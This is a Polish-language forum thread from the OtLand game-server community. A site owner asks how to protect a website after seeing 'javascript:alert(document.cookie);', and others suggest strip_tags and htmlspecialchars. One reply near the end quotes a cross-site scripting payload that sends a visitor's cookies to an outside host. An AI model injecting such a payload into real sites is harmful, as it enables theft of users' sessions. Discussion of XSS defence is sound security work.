• There is NO official Otland's Discord server and NO official Otland's server list. The Otland's Staff does not manage any Discord server or server list. Moderators or administrator of any Discord server or server lists have NO connection to the Otland's Staff. Do not get scammed!

javascript:alert(document.cookie);

Verdis

Ciekawy świata.
Joined
May 28, 2012
Messages
394
Reaction score
9
Location
Poland
Siemka,
da się jakoś zabezpieczyć stronkę www przed:
"javascript:alert(document.cookie);"..?
Proszę o pomoc. :D
 
nie rozumiem o co Ci chodzi, o wyciaganie session id? nie da sie... chyba ze masz inny lepszy pomysl na sesje
 
strip_tags, htmlspecialchars, ale żeby było naprawde bezpiecznie to trzeba napisać większy kod bo są miliony sposobów wykonania xss.
 
Ostro widzę... ;/ Jest możliwość wykradzenia moich plików z vpsa, nie znając hasła itp.. ? (wykorzystując bugi)
 
Patrzałem na znanych serverach tibi, nie wyświetla im żadnego komunikatu po wpisaniu: " javascript:alert(document.cookie);" jak to zrobić (zabezpieczyć) ? ;/
 
Patrzałem na znanych serverach tibi, nie wyświetla im żadnego komunikatu po wpisaniu: " javascript:alert(document.cookie);" jak to zrobić (zabezpieczyć) ? ;/
Ale co ty niby chcesz zabezpieczać? Nie wyświetla nic, ponieważ się tam pewnie nie logowałeś. Jeśli chcesz to przerób sobie acc makera, aby nie pamiętał logowań - pozbędziesz się ciasteczek.
 
Oglądałem z 100 filmów na yt o tym.
filmy to nie to samo, lepiej popróbować w praktyce opcji na xss jest tak wiele, ze masakra, a główna jej zaleta to:
Code:
<script>window.location = "http://mojawww.pl/?cookisy="+document.cookie;</script>
 
Last edited:
Back
Top